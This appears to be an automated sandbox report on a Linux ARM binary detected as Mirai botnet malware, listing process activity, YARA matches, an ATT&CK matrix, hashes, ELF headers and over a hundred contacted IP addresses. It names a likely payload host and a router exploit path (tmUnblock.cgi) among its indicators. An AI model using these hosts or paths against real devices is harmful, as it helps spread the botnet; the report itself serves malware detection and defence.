              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1497/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1496/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3157/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3278/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1659/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3210/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3298/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3052/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/680/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/681/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3292/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1701/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1666/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3205/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3047/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3201/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/723/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/724/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1704/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1669/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3060/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1440/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3222/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3188/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3220/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3064/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3062/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3183/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1679/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/850/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1432/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1553/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5513)Queries kernel information via 'uname': Jump to behavior
              Source: CuruFoiJiK.elf, 5513.1.00007ffea2b4e000.00007ffea2b6f000.rw-.sdmp, CuruFoiJiK.elf, 5517.1.00007ffea2b4e000.00007ffea2b6f000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/CuruFoiJiK.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/CuruFoiJiK.elf
              Source: CuruFoiJiK.elf, 5513.1.00005604a1814000.00005604a1942000.rw-.sdmp, CuruFoiJiK.elf, 5517.1.00005604a1814000.00005604a1942000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
              Source: CuruFoiJiK.elf, 5513.1.00005604a1814000.00005604a1942000.rw-.sdmp, CuruFoiJiK.elf, 5517.1.00005604a1814000.00005604a1942000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/arm
              Source: CuruFoiJiK.elf, 5513.1.00007ffea2b4e000.00007ffea2b6f000.rw-.sdmp, CuruFoiJiK.elf, 5517.1.00007ffea2b4e000.00007ffea2b6f000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

              Stealing of Sensitive Information

              barindex
              Yara detected Mirai
              Source: Yara matchFile source: CuruFoiJiK.elf, type: SAMPLE
              Source: Yara matchFile source: 5513.1.00007f1d38017000.00007f1d38024000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5517.1.00007f1d38017000.00007f1d38024000.r-x.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected Mirai
              Source: Yara matchFile source: CuruFoiJiK.elf, type: SAMPLE
              Source: Yara matchFile source: 5513.1.00007f1d38017000.00007f1d38024000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5517.1.00007f1d38017000.00007f1d38024000.r-x.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
              Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume Access1
              OS Credential Dumping              		11
              Security Software Discovery              		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
              Non-Standard Port              		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
              Domain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
              Non-Application Layer Protocol              		Data Encrypted for ImpactDNS ServerEmail Addresses
              Local AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureTraffic Duplication3
              Application Layer Protocol              		Data DestructionVirtual Private ServerEmployee Names
              Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeyloggingScheduled Transfer2
              Ingress Tool Transfer              		Data Encrypted for ImpactServerGather Victim Network Information

              Malware Configuration

              No configs have been found

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1365649 Sample: CuruFoiJiK.elf Startdate: 21/12/2023 Architecture: LINUX Score: 80 20 178.4.51.159 VODANETInternationalIP-BackboneofVodafoneDE Germany 2->20 22 93.151.182.110 VODAFONE-IT-ASNIT Italy 2->22 24 98 other IPs or domains 2->24 26 Malicious sample detected (through community Yara rule) 2->26 28 Antivirus / Scanner detection for submitted sample 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 Yara detected Mirai 2->32 8 CuruFoiJiK.elf 2->8         started        signatures3 process4 process5 10 CuruFoiJiK.elf 8->10         started        process6 12 CuruFoiJiK.elf 10->12         started        14 CuruFoiJiK.elf 10->14         started        16 CuruFoiJiK.elf 10->16         started        18 CuruFoiJiK.elf 10->18         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              CuruFoiJiK.elf73%ReversingLabsLinux.Trojan.Mirai
              CuruFoiJiK.elf66%VirustotalBrowse
              CuruFoiJiK.elf100%AviraEXP/ELF.Mirai.Bot.Hua.d

              Dropped Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://45.142.182.103:80/tmUnblock.cgifalse
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://45.142.182.103/binCuruFoiJiK.elffalse
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  52.254.111.182
                  		unknownUnited States
                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  42.93.231.4
                  		unknownChina
                  		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  212.159.149.223
                  		unknownUnited Kingdom
                  		9105TISCALI-UKTalkTalkCommunicationsLimitedGBfalse
                  210.47.69.144
                  		unknownChina
                  		4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                  23.216.221.176
                  		unknownUnited States
                  		16625AKAMAI-ASUSfalse
                  163.84.196.104
                  		unknownFrance
                  		17816CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovifalse
                  8.20.93.50
                  		unknownUnited States
                  		30372SUNESYS2USfalse
                  146.210.255.203
                  		unknownAustria
                  		42114VNWT-ASATfalse
                  5.60.242.95
                  		unknownPoland
                  		8374PLUSNETPlusnetworkoperatorinPolandPLfalse
                  178.4.51.159
                  		unknownGermany
                  		3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                  178.103.193.152
                  		unknownUnited Kingdom
                  		12576EELtdGBfalse
                  57.147.18.70
                  		unknownBelgium
                  		2686ATGS-MMD-ASUSfalse
                  37.8.169.66
                  		unknownFrance
                  		51207FREEMFRfalse
                  187.197.150.255
                  		unknownMexico
                  		8151UninetSAdeCVMXfalse
                  13.102.144.130
                  		unknownUnited States
                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  178.87.227.27
                  		unknownSaudi Arabia
                  		25019SAUDINETSTC-ASSAfalse
                  185.145.21.253
                  		unknownAustria
                  		51890MAYR-MELNHOFATfalse
                  192.49.160.61
                  		unknownFinland
                  		375TIETOTIE-ASPOBox38FI-00441HelsinkiFinlandEUfalse
                  52.123.104.152
                  		unknownUnited States
                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  118.65.22.16
                  		unknownChina
                  		4713OCNNTTCommunicationsCorporationJPfalse
                  219.63.208.42
                  		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                  42.80.118.90
                  		unknownChina
                  		17638CHINATELECOM-TJ-AS-APASNforTIANJINProvincialNetofCTfalse
                  103.196.44.173
                  		unknownIndonesia
                  		56248INDAHKIATPP-AS-IDPTINDAHKIATPULPPAPERTbkIDfalse
                  73.96.201.63
                  		unknownUnited States
                  		7922COMCAST-7922USfalse
                  211.40.226.226
                  		unknownKorea Republic of
                  		3786LGDACOMLGDACOMCorporationKRfalse
                  100.9.37.159
                  		unknownUnited States
                  		5650FRONTIER-FRTRUSfalse
                  58.181.254.136
                  		unknownThailand
                  		7693COMNET-THKSCCommercialInternetCoLtdTHfalse
                  199.105.47.6
                  		unknownUnited States
                  		7018ATT-INTERNET4USfalse
                  216.184.218.26
                  		unknownUnited States
                  		4565MEGAPATH2-USfalse
                  102.102.36.38
                  		unknownMorocco
                  		36925ASMediMAfalse
                  37.69.111.62
                  		unknownFrance
                  		15557LDCOMNETFRfalse
                  177.202.34.172
                  		unknownBrazil
                  		8167BrasilTelecomSA-FilialDistritoFederalBRfalse
                  79.185.87.125
                  		unknownPoland
                  		5617TPNETPLfalse
                  64.147.98.89
                  		unknownUnited States
                  		11403NYINTERNETUSfalse
                  37.205.15.223
                  		unknownCzech Republic
                  		24971MASTER-ASCzechRepublicwwwmasterczCZfalse
                  179.157.12.124
                  		unknownBrazil
                  		28573CLAROSABRfalse
                  93.151.182.110
                  		unknownItaly
                  		30722VODAFONE-IT-ASNITfalse
                  132.215.179.133
                  		unknownCanada
                  		376RISQ-ASCAfalse
                  42.21.33.102
                  		unknownKorea Republic of
                  		9644SKTELECOM-NET-ASSKTelecomKRfalse
                  79.12.221.165
                  		unknownItaly
                  		3269ASN-IBSNAZITfalse
                  36.45.96.33
                  		unknownChina
                  		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  111.84.244.44
                  		unknownThailand
                  		24378ENGTAC-AS-TH-APTotalAccessCommunicationPLCTHfalse
                  79.62.227.219
                  		unknownItaly
                  		3269ASN-IBSNAZITfalse
                  2.77.58.152
                  		unknownKazakhstan
                  		29355KCELL-ASKZfalse
                  79.118.59.20
                  		unknownRomania
                  		8708RCS-RDS73-75DrStaicoviciROfalse
                  140.234.122.142
                  		unknownUnited States
                  		6932EBSCOPUBUSfalse
                  47.207.214.248
                  		unknownUnited States
                  		5650FRONTIER-FRTRUSfalse
                  130.170.163.21
                  		unknownUnited States
                  		12173UAUSfalse
                  94.54.78.121
                  		unknownTurkey
                  		47524TURKSAT-ASTRfalse
                  65.247.243.206
                  		unknownUnited States
                  		701UUNETUSfalse
                  17.159.222.66
                  		unknownUnited States
                  		714APPLE-ENGINEERINGUSfalse
                  37.8.158.165
                  		unknownRussian Federation
                  		42038VLADLINK-ASRUfalse
                  83.169.117.113
                  		unknownFrance
                  		8784AS8784ManagedServicesProviderFRfalse
                  101.43.77.227
                  		unknownChina
                  		4847CNIX-APChinaNetworksInter-ExchangeCNfalse
                  2.113.39.129
                  		unknownItaly
                  		3269ASN-IBSNAZITfalse
                  179.41.145.205
                  		unknownArgentina
                  		22927TelefonicadeArgentinaARfalse
                  94.147.61.107
                  		unknownDenmark
                  		9158TELENOR_DANMARK_ASDKfalse
                  221.38.97.42
                  		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                  203.146.48.194
                  		unknownThailand
                  		4750CSLOXINFO-AS-APCSLOXINFOPUBLICCOMPANYLIMITEDTHfalse
                  44.13.22.208
                  		unknownUnited States
                  		7377UCSDUSfalse
                  210.186.205.151
                  		unknownMalaysia
                  		4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
                  102.45.70.162
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  118.8.227.68
                  		unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                  20.44.231.188
                  		unknownUnited States
                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  37.186.202.200
                  		unknownItaly
                  		12874FASTWEBITfalse
                  156.241.153.134
                  		unknownSeychelles
                  		137443ANCHGLOBAL-AS-APAnchnetAsiaLimitedHKfalse
                  79.131.32.38
                  		unknownGreece
                  		6799OTENET-GRAthens-GreeceGRfalse
                  118.255.147.35
                  		unknownChina
                  		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  2.133.122.107
                  		unknownKazakhstan
                  		9198KAZTELECOM-ASKZfalse
                  2.254.3.127
                  		unknownSweden
                  		3301TELIANET-SWEDENTeliaCompanySEfalse
                  202.188.117.224
                  		unknownMalaysia
                  		4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
                  109.32.62.177
                  		unknownNetherlands
                  		15480VFNL-ASVodafoneNLAutonomousSystemNLfalse
                  217.77.161.148
                  		unknownCzech Republic
                  		16019VODAFONE-CZ-ASCZfalse
                  5.105.175.117
                  		unknownUkraine
                  		43554CDS-ASUAfalse
                  184.8.178.193
                  		unknownUnited States
                  		7011FRONTIER-AND-CITIZENSUSfalse
                  208.187.168.229
                  		unknownUnited States
                  		16578DATANOCUSfalse
                  178.124.235.148
                  		unknownBelarus
                  		6697BELPAK-ASBELPAKBYfalse
                  193.202.137.79
                  		unknownGermany
                  		13043BAYER-ASDEfalse
                  133.249.94.143
                  		unknownJapan17947S-UTOPIASAKURAKCSCorporationJPfalse
                  210.255.206.75
                  		unknownJapan2516KDDIKDDICORPORATIONJPfalse
                  149.33.35.234
                  		unknownUnited States
                  		174COGENT-174USfalse
                  168.161.177.180
                  		unknownUnited States
                  		38027MOST-AS-APInformationCenterMinistryofSciandTechCNfalse
                  61.19.157.102
                  		unknownThailand
                  		9931CAT-APTheCommunicationAuthoityofThailandCATTHfalse
                  77.170.39.10
                  		unknownNetherlands
                  		1136KPNKPNNationalEUfalse
                  5.210.100.155
                  		unknownIran (ISLAMIC Republic Of)
                  		197207MCCI-ASIRfalse
                  212.223.243.211
                  		unknownGermany
                  		8741RATIOKONTAKTDEfalse
                  107.60.118.44
                  		unknownUnited States
                  		16567NETRIX-16567USfalse
                  206.204.173.91
                  		unknownUnited States
                  		4544CONXION-AUSfalse
                  138.133.183.56
                  		unknownUnited States
                  		3269ASN-IBSNAZITfalse
                  210.27.122.200
                  		unknownChina
                  		4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                  172.138.218.19
                  		unknownUnited States
                  		7018ATT-INTERNET4USfalse
                  210.212.213.16
                  		unknownIndia
                  		9829BSNL-NIBNationalInternetBackboneINfalse
                  212.48.233.125
                  		unknownRussian Federation
                  		51093VMCITYRUfalse
                  210.123.22.130
                  		unknownKorea Republic of
                  		4766KIXS-AS-KRKoreaTelecomKRfalse
                  118.248.146.228
                  		unknownChina
                  		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  145.21.57.217
                  		unknownNetherlands
                  		1103SURFNET-NLSURFnetTheNetherlandsNLfalse
                  97.156.159.8
                  		unknownUnited States
                  		6167CELLCO-PARTUSfalse
                  118.32.107.142
                  		unknownKorea Republic of
                  		4766KIXS-AS-KRKoreaTelecomKRfalse
                  186.113.206.92
                  		unknownColombia
                  		3816COLOMBIATELECOMUNICACIONESSAESPCOfalse
                  87.91.134.152
                  		unknownFrance
                  		5410BOUYGTEL-ISPFRfalse

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  52.254.111.182miori.i6-20220605-0338Get hashmaliciousUnknownBrowse
                    42.93.231.4armGet hashmaliciousMiraiBrowse
                      210.47.69.144BpWEfZ5bOUGet hashmaliciousMiraiBrowse
                        23.216.221.1766r2OCh1AUl.elfGet hashmaliciousMiraiBrowse
                          8.20.93.50gG3Egh3d5T.elfGet hashmaliciousMiraiBrowse
                            146.210.255.203sora.arm7.elfGet hashmaliciousMiraiBrowse
                              5.60.242.95yir8ieZzXLGet hashmaliciousGafgyt MiraiBrowse
                                178.4.51.159rih4uw6saZ.elfGet hashmaliciousMiraiBrowse
                                  178.103.193.152eSKlRCffX4Get hashmaliciousMiraiBrowse
                                    57.147.18.70wxHi1xmNqOGet hashmaliciousMiraiBrowse

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      MICROSOFT-CORP-MSN-AS-BLOCKUShttps://wep.foundation/joQ3El-Q-4Gr4RAdgQ3Ewam3TQ3Er-4Gank-y5n-d58Kvo-y5Get hashmaliciousUnknownBrowse
                                      • 13.107.213.41
                                      https://xc4v655.blob.core.windows.net/dfdf/bzdfzz.html#cl/86003_md/1/4164/918/101/31543Get hashmaliciousHTMLPhisherBrowse
                                      • 20.60.134.228
                                      https://cl.s13.exct.net/?qs=58966b71d01b46e59cb2ad5ab21882213e404d8ee1da250ec9afe95ab701241f2e4feb327c75ef2c31f5c41faa4fa8d3Get hashmaliciousUnknownBrowse
                                      • 13.107.42.14
                                      27i42a6Qag.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoaderBrowse
                                      • 52.101.68.36
                                      4d2e6ef6-e1a5-75b9-7f89-d45656f4631e.emlGet hashmaliciousHTMLPhisherBrowse
                                      • 40.126.28.11
                                      SecuriteInfo.com.Win32.SpywareX-gen.21740.30024.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                      • 150.171.41.11
                                      https://ecv.microsoft.com/TJCqFmMAkZGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                      • 13.107.246.41
                                      YfygD41CEE.exeGet hashmaliciousPayPal Phisher, RisePro Stealer, SmokeLoader, Vidar, zgRATBrowse
                                      • 13.107.213.41
                                      975630233a6e.docxGet hashmaliciousUnknownBrowse
                                      • 52.123.247.25
                                      https://download-installer.cdn.mozilla.net/pub/firefox/releases/121.0/update/win64/de/firefox-120.0.1-121.0.partial.marGet hashmaliciousUnknownBrowse
                                      • 52.109.6.53
                                      Setup.msiGet hashmaliciousUnknownBrowse
                                      • 20.94.144.183
                                      http://fullblue.co.ukGet hashmaliciousUnknownBrowse
                                      • 20.108.44.128
                                      e-Receipt.htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 13.68.23.144
                                      https://download-installer.cdn.mozilla.net/pub/firefox/releases/121.0/update/win64/de/firefox-120.0.1-121.0.partial.marGet hashmaliciousUnknownBrowse
                                      • 52.109.20.38
                                      Z8g13DVLej.exeGet hashmaliciousPayPal Phisher, RisePro Stealer, SmokeLoader, Vidar, zgRATBrowse
                                      • 13.107.213.41
                                      https://download-installer.cdn.mozilla.net/pub/firefox/releases/121.0/update/win64/de/firefox-120.0.1-121.0.partial.marGet hashmaliciousUnknownBrowse
                                      • 52.109.0.91
                                      VDIbCKYOlG.exeGet hashmaliciousPayPal Phisher, RisePro Stealer, SmokeLoader, Vidar, zgRATBrowse
                                      • 13.107.213.41
                                      Oden_PO2339.exeGet hashmaliciousAveMaria, UACMeBrowse
                                      • 13.107.213.41
                                      YX1CxTwW9j.exeGet hashmaliciousPayPal Phisher, RisePro Stealer, SmokeLoader, Vidar, zgRATBrowse
                                      • 13.107.213.40
                                      XAxaAbjIBy.exeGet hashmaliciousRisePro Stealer, SmokeLoader, Vidar, zgRATBrowse
                                      • 13.107.246.41
                                      CHINANET-BACKBONENo31Jin-rongStreetCNhttps://browndoguniversity.com/americanexpress-com.connect-online.page/amexs.htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 63.140.38.163
                                      https://pixel.ad.lifesight.io/pixel/event/0OSNKL?event=CLICK&ios_idfa=%5Bios_idfa%5D&android_gaid=%5Bandroid_gaid%5D&cid=%5Bcampaign_id%5D&app=%5Bapp_name%5D&channel=customdsp&cv=Adbro_330e_320x472&dnt=%5Bdo_not_track%5D&cb=timestamp&ts=%5BcurrentTime%5D&redirect=https://itkrish.com/-./Get hashmaliciousUnknownBrowse
                                      • 63.140.38.232
                                      https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:7e2ff22d-e9ad-4bf2-9af9-8280f312d601Get hashmaliciousUnknownBrowse
                                      • 63.140.38.160
                                      https://americuer.com/Get hashmaliciousUnknownBrowse
                                      • 63.140.38.123
                                      PO#800019DOCS.exeGet hashmaliciousUnknownBrowse
                                      • 63.140.38.139
                                      Comprobante Fiscal Digital - d1S4S7k6l4d2D09043655750.htmlGet hashmaliciousUnknownBrowse
                                      • 63.140.38.123
                                      https://aumc.patientbillhelp.com/Get hashmaliciousUnknownBrowse
                                      • 63.140.38.151
                                      nig.x86_64.elfGet hashmaliciousMiraiBrowse
                                      • 112.66.21.232
                                      nig.arm5.elfGet hashmaliciousMiraiBrowse
                                      • 1.180.136.207
                                      rpmOhktwoL.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, StealcBrowse
                                      • 63.140.38.201
                                      nig.x86.elfGet hashmaliciousMiraiBrowse
                                      • 171.89.233.97
                                      arm4-20231216-1307.elfGet hashmaliciousMiraiBrowse
                                      • 114.217.239.156
                                      x86-20231216-1307.elfGet hashmaliciousMiraiBrowse
                                      • 202.109.254.20
                                      mpsl-20231216-1307.elfGet hashmaliciousMiraiBrowse
                                      • 59.59.128.231
                                      x86_64-20231216-1307.elfGet hashmaliciousMiraiBrowse
                                      • 111.224.68.182
                                      arm7-20231216-1307.elfGet hashmaliciousMiraiBrowse
                                      • 106.58.169.172
                                      mpsl-20231216-1226.elfGet hashmaliciousMiraiBrowse
                                      • 183.34.75.121
                                      x86-20231216-1225.elfGet hashmaliciousMiraiBrowse
                                      • 218.64.145.139
                                      arm7-20231216-1225.elfGet hashmaliciousMiraiBrowse
                                      • 116.5.97.45
                                      arm4-20231216-1200.elfGet hashmaliciousMiraiBrowse
                                      • 115.203.46.198

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      No created / dropped files found

                                      Static File Info

                                      General

                                      File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                      Entropy (8bit):6.116816945510729
                                      TrID:
                                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                      File name:CuruFoiJiK.elf
                                      File size:51'308 bytes
                                      MD5:da7737b175d9705ae82eb0f44e062cc4
                                      SHA1:237f4c70778c9facb36ad5c15c8bea79b9566464
                                      SHA256:a5d0279b09187f79c867ef741fe1371809d222979c4f42b45e9f9c7cb6bf8297
                                      SHA512:ece87f47833076da214e2e9e852a68d1f609db9f2997fecb208926ab575d3b5467b457f0a2e006c72ede7c4f78f50e5261d6499d0ef148ddf0ef5d923c4471b8
                                      SSDEEP:768:/E5I4ZHi6n0X/qQOgH1SCR51PJq7VDtTjPXtygDFdpvsmLBN+gtQgaAl6D1:CI4ZHH0iQOcv51xq7vTXImjp
                                      TLSH:3C330952BC91CA02CAD42376FA2E02CD372123D9E2EE72039E256F5077CB95E0D7B556
                                      File Content Preview:.ELF...a..........(.........4...........4. ...(.....................................................X...............Q.td..................................-...L."...E-..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                      Static ELF Info

                                      ELF header

                                      Class:ELF32
                                      Data:2's complement, little endian
                                      Version:1 (current)
                                      Machine:ARM
                                      Version Number:0x1
                                      Type:EXEC (Executable file)
                                      OS/ABI:ARM - ABI
                                      ABI Version:0
                                      Entry Point Address:0x8190
                                      Flags:0x202
                                      ELF Header Size:52
                                      Program Header Offset:52
                                      Program Header Size:32
                                      Number of Program Headers:3
                                      Section Header Offset:50868
                                      Section Header Size:40
                                      Number of Section Headers:11
                                      Header String Table Index:10

                                      Sections

                                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                      NULL0x00x00x00x00x0000
                                      .initPROGBITS0x80940x940x180x00x6AX004
                                      .textPROGBITS0x80b00xb00xb54c0x00x6AX0016
                                      .finiPROGBITS0x135fc0xb5fc0x140x00x6AX004
                                      .rodataPROGBITS0x136100xb6100xe040x00x2A004
                                      .ctorsPROGBITS0x1c4180xc4180x80x00x3WA004
                                      .dtorsPROGBITS0x1c4200xc4200x80x00x3WA004
                                      .jcrPROGBITS0x1c4280xc4280x40x00x3WA004
                                      .dataPROGBITS0x1c42c0xc42c0x2440x00x3WA004
                                      .bssNOBITS0x1c6700xc6700x3c40x00x3WA004
                                      .shstrtabSTRTAB0x00xc6700x430x00x0001

                                      Program Segments

                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                      LOAD0x00x80000x80000xc4140xc4146.15210x5R E0x8000.init .text .fini .rodata
                                      LOAD0xc4180x1c4180x1c4180x2580x61c2.92940x6RW 0x8000.ctors .dtors .jcr .data .bss
                                      GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                                      Network Behavior

                                      Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

                                      System Behavior

                                      General

                                      Start time (UTC):16:00:51
                                      Start date (UTC):21/12/2023
                                      Path:/tmp/CuruFoiJiK.elf
                                      Arguments:/tmp/CuruFoiJiK.elf
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                      Chronological Activities


                                      General

                                      Start time (UTC):16:00:52
                                      Start date (UTC):21/12/2023
                                      Path:/tmp/CuruFoiJiK.elf
                                      Arguments:-
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                      Chronological Activities


                                      General

                                      Start time (UTC):16:00:52
                                      Start date (UTC):21/12/2023
                                      Path:/tmp/CuruFoiJiK.elf
                                      Arguments:-
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                      Chronological Activities


                                      General

                                      Start time (UTC):16:00:52
                                      Start date (UTC):21/12/2023
                                      Path:/tmp/CuruFoiJiK.elf
                                      Arguments:-
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                      General

                                      Start time (UTC):16:00:52
                                      Start date (UTC):21/12/2023
                                      Path:/tmp/CuruFoiJiK.elf
                                      Arguments:-
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                      General

                                      Start time (UTC):16:00:52
                                      Start date (UTC):21/12/2023
                                      Path:/tmp/CuruFoiJiK.elf
                                      Arguments:-
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                      Chronological Activities